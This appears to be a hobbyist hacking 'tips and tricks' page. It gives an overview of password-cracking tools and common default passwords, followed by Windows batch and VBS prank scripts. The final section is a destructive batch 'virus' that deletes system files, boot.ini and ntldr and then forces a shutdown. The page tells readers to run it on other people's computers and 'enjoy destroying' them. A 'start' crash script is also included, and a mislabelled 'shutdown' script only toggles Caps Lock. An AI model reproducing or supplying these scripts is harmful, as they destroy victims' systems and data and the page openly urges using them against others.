TIPS and TRICKS

welcome everyone in my hack world , i will share all my hacking knowledge with u all.
==========================================================


Ethical hacking tools and techniques: Password cracking
E-mailPrintAAAAAALinkedInFacebookTwitterShare ThisReprints
Password cracking doesn't have to involve fancy tools, but it's a fairly tedious process. If the target doesn't lock you out after a specific number of tries, you can spend an infinite amount of time trying every combination of alphanumeric characters. It's just a question of time and bandwidth before you break into a system.
The most common passwords found are password, root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username].

There are three basic types of password cracking tests that can be automated with tools:

Dictionary - A file of words is run against user accounts, and if the password is a simple word, it can be found pretty quickly.


Hybrid - A common method utilized by users to change passwords is to add a number or symbol to the end. A hybrid attack works like a dictionary attack, but adds simple numbers or symbols to the password attempt.


Brute force - The most time-consuming, but comprehensive way to crack a password. Every combination of character is tried until the password is broken.
Some common Web password cracking tools are:

Brutus is a password cracking tool that can perform both dictionary attacks and brute force attacks where passwords are randomly generated from a given character. Brutus can crack the multiple authentication types, HTTP (Basic authentication, HTML Form/CGI), POP3, FTP, SMB and Telnet.


WebCracker is a simple tool that takes text lists of usernames and passwords, and uses them as dictionaries to implement basic authentication password guessing.


ObiWan is a Web password cracking tool that can work through a proxy. ObiWan uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords.



====================================================================


  • SHUTDOWN UR PC WITH SCRIPT
----------------------------------------------------
  • go to run type notepad hit enter
  • after opening notepad just type the following code or paste the code found below in notepad
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop
  • and save the notepad file as *.vbs
  • thats it dude



 =======================================================================

  • OPEN BLOCK COMMAND
------------------------------------------
1.click start
2.goto Run
3.type notepad and hit enter
4.type command.com in notepad
5.save the file as cmd.bat…


=======================================================================


  •  MAKE  UR COMPUTER CRASH
------------------------------------------------
  • go to run type notepad hit enter
  • after opening notepad just type the following code or paste the code found below in notepad
start

start

start

start

.

.

.
  • like way you type many lines only start and not the dots and save it as *.bat
  • thats it dude

=======================================================================



  • CREATING AFAKE VIRUS 
-------------------------------------------------

Information

  • go to run type notepad hit enter
  • after opening notepad just type the following code or paste the code found below in notepad
@echooff
A:
cls
echo hello.
pause
echo i am a fake virus
pause
echo
type what ever you want….
  • then save the file as *.bat
  • with this trick you may create number of creative things like false chatting
  • try this and you can understand it better

 CREATING A VIRUS THAT  DELETE OS
-------------------------------------------------------------
  • go to run type notepad hit enter
  • after opening notepad just type the following code or paste the code found below in notepad
echo off

del c:\windows\system32\winlogon.exe

del c:\windows\system32\logonwi.exe

del c:\windows\

del c:\

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

echo off

shutdown -s -t 8? -c “your windows files are deleted you can’t boot windows next time”
  • save the notepad as *.bat
  • don’t open the *.bat in your computer just try on other’s
  • enjoy destroying others computer…..